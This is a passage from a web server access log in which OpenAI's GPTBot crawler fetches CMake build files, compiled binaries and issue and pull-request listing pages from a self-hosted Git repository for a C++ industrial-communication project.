+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:18:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11340] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:18:34:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12184] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:18:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:18:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11619] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:18:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:18:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11342] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:18:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:18:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11618] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:18:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:34:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:18:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:18:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:18:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=source" [Client 74.7.227.38] [Length 11620] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:18:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:34:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:34:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:34:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:34:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:34:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:18:34:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 11751] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:34:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:34:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:35:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:18:35:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.06] [Sent-to 